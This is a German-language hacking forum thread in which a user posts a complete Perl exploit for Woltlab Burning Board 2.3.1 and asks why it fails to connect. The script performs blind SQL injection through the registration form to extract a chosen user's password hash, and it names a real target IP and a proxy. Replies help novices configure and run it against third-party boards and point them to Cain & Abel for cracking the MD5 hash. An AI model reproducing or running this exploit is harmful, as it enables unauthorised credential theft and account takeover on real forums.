#1 24. Dezember 2005 Also ich hab hier ein Wbb 2.3.1 Exploit, aber ich kann ums verrecken nicht connecten. Er sage immer er kann nicht connecten weil was in der zeile 51 ist. Liegt das jetzt am Code oder ein mir?? Und wenn jemand was weiß dann sagt er bitte. Code: #!/usr/bin/perl use strict; use IO::Socket::INET; $| = print " Woltlab Burning Board <= 2.3.1 Exploit Vulnerability discovered by GulfTech Security Research Visit www.security-project.org Exploit by deluxe89 ---------- "; my $host = '81.209.184.187'; my $path = '/wbb/'; # path to the board my $userid = 490; # the password hash will be from the user with this id my $username = 'Marc'; # any username from the board my $proxy = '219.136.239.51:80'; # proxy, you can leave this empty my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards # proxy handling my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80); if($proxy ne '') { print "[~] Using a proxy\n"; } else { print "[~] You're using NO proxy!\n"; sleep(1); } # # Get the hash # print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: "; my $hash = ''; for(my $i=1;$i<33;$i++) { my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 50) or die('[-] Could not connect to server'); if(&test($i, 96)) # buchstabe { for(my $c=97;$c<103;$c++) { if(&test($i, $c, 1)) { print pack('c', $c); last; } } } else # zahl { #print "0-4\n"; for(my $c=48;$c<58;$c++) { if(&test($i, $c, 1)) { print pack('c', $c); last; } } } } print "\n"; sub test { my ($i, $num, $g) = @_; my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server'); my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))"; $value .= ($g) ? '=' : '>'; $value .= "$num)/*"; my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed"; print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n"; while(<$sock>) { if($_ =~ m/$error/) { return 1; } } return 0; } + Multi-Zitat Zitieren
#2 25. Dezember 2005 lass doch ma den Proxy weg... und teste das ma an einem board von dir ! Vieleicht liegts am Proxy!!! + Multi-Zitat Zitieren
#4 25. Dezember 2005 Liegt an dir oder deiner Verbindung.. gerade erfolgreich getestet.. //ich hoffe doch du hast die IP und den Pfad angepasst.. 81.209.184.187/wbb/ => permission denied + Multi-Zitat Zitieren
#5 25. Dezember 2005 das kann auch dan dem proxy liegen ist bei mir auch öfters so + Multi-Zitat Zitieren
#8 27. Dezember 2005 muss ich für perl irgendwas einstellen? also hab XP mit Sp2 und zonealarm. wie man im code sehen kann öftnet er ein port oder so. wielleicht wird das unterbunden? + Multi-Zitat Zitieren
#9 27. Dezember 2005 hast du active perl? wenn ja durch zonealarm freigegeben? welchen befehl gibst du ein? hast du die url richtig eingegeben? die richtige userid? frag dich diese fragen selber mal... Hier mal compiled: - Einfach "perl boardurl userid" eingeben => hash wird herausgegeben! + Multi-Zitat Zitieren
#10 28. Dezember 2005 Soll das ne Verarsche sein? Und wie kann ich active perl freigeben(gibt ja mehrere Dateien)? oder gibt es noch andere ausser active? + Multi-Zitat Zitieren
#11 30. Dezember 2005 wieso verarsche? beim exploit musst du ja auch deine einstellungen vornehmen, das passiert hier alles automatisch, was ist dein problem? achja du musst wbb davor schreiben^^ hab ich vergessen zu sagen! also wenn ihr active perl installiert abt: cmd öffnen -> in den ordner wo das wbb.exe liegt gehn -> wbb [Target] [Userid] eingeben! ein Beispeil wäre: wbb http://www.forum.de/wbb2/ 3 dann noch enter und der hash wir dercrackt wers nicht glaubt, dem kann ich per icq weiterhelfen! + Multi-Zitat Zitieren
#13 18. Januar 2006 Also irgendwie kommt bei mir auch der gleiche Fehler! Bei mir ist es aber leider in Zeit 23! Wobei da bei mir nix drinne steht Kann mir jemand helfen und vllt nen Code geben der auch funktioniert, wo ich nur noch IP usw ändern muss? Gr33tz MasterBK 8) + Multi-Zitat Zitieren
#16 24. Januar 2006 Ich habe folgendes Prob wenn ich den Hash auslesen will funktioniert dies nur wenn ich kein Proxy Server an habe sonst bleibt der wert Hash blank und wird einfach übersprungen. Hatt von euch jemand vllt. ne Idee ?( MFG Final X-2 + Multi-Zitat Zitieren
#17 24. Januar 2006 Kannste mal en Tutorial für diesen Exploit machen, weil ich check den auf keinem AUGE... leider. musst für mich au die Details erklären ^^ + Multi-Zitat Zitieren
#18 24. Januar 2006 Hi, @Marlon: 1.)Du erstellst eine exploit.pl 2.)du nimmst einfach den Code, der oben steht und kopierst ihn in exploit.pl 3.) Du suchst am Anfang des Exploits die ganzen Variablen: my $host = '' my $path = '' u.s.w. und setzt für diese Variablen ein. Also z.B. ist der host http://www.dasisteinforum.de und der path zum "Forum" lautet /wbb: my $host = 'dasisteinforum.de' my $path = '/wbb/' Bzw. ich bin mir nicht sicher , obs 'wbb' oder '/wbb' oder '/wbb/' ist. Einfach mal testen. Wenn du jetzt alle Variablen eingesetzt hast, einfach per Console den exploit starten. Das machst du mit perl: Code: du@woauchimmer:~$ perl exploit.pl Danach einfach den Output anschauen. Wenn irgendwas nicht funktioniert, nochmal die Variablen überprüfen. Mfg, Kolazomai + Multi-Zitat Zitieren
#19 25. Januar 2006 hm... erstmal THX für dein mini-tut. en 10ner hast, aber ein problem wäre da noch. Nämlich das wo der Output is und wie ich den exploit.pl mit active perl öffnen kann, ich kapiere dies du@woauchimmer nicht ^^ sag mal wie ich des in perl eingeben muss. THX so siehts bei mir aus : my $host = 'http://43112.rapidforum.com/'; my $path = '/wbb/'; # path to the board my $userid = 1; # the password hash will be from the user with this id my $username = 'WizZ4rd'; # any username from the board my $proxy = '219.136.239.51:80'; # proxy, you can leave this empty my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards + Multi-Zitat Zitieren
#20 25. Januar 2006 Also bei mir funzts soweit... nur wie gehe ich weiter vor? Was mache ich dann mit dem md5 hash ?( Sry wenn ich wie ein absoluter n00b klinge aber ich hab mit exploits noch nix gemacht... GreetZ, ~Br4inP4in~ + Multi-Zitat Zitieren
#21 25. Januar 2006 @Marlon: in das Verzeichnis von active-perl im cmd ( start ->ausführen->cmd) wechseln und dann "perl.exe C: \exploit.pl" eingeben. @Brain: mit z.b. Cain (&Abel ) entschlüsseln. Mfg, Kolazomai + Multi-Zitat Zitieren
#22 25. Januar 2006 Sorry, aber ich bin einfach zu blöd das zu kapieren ?( bin auch en totaler n00b auf diesem gebiet weil ich da au noch nie was gemacht habe. Wäre sehr net, wenn du nomal so en Stichwort tut machen würdest, aber noch en bissle mehr erklären ^^ wäre net. Sp siehts bei mir aus : my $host = 'http://43112.rapidforum.com/'; my $path = '/wbb/'; # path to the board my $userid = 1; # the password hash will be from the user with this id my $username = 'WizZ4rd'; # any username from the board my $proxy = '219.136.239.51:80'; # proxy, you can leave this empty my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards + Multi-Zitat Zitieren
#23 25. Januar 2006 @Marlon Mit dem Board welches du eingetragen hast kann es auch nicht funktionieren da es kein Woltlab Burning Board 2.3.1 und sich dieser Exploit nur auf solche Boards bezieht :] @~Br4inP4in~ Hierher bekommste Cain&Abel falls du hilfe brauchst sag bescheid MFG Final X-2 //EDIT BOB sry wegen der Rechtschreibung, wusste es nicht mehr ganz genau + Multi-Zitat Zitieren
#24 25. Januar 2006 Lol da musste ich mir auch schon einen ablachen, er will den exploit bei nem rapidforum anwenden ^^ zu geil ! ahja es Heißt Woltlab Burning Board + Multi-Zitat Zitieren
#25 26. Januar 2006 Thx@Final X-2, aber hatte es schon gefunden :] Denke ich komme damit zurecht, aber doch recht vielseitiges tool , wundert mich dass ich es noch nie gesehen hab... GreetZ, ~Br4inP4in~ + Multi-Zitat Zitieren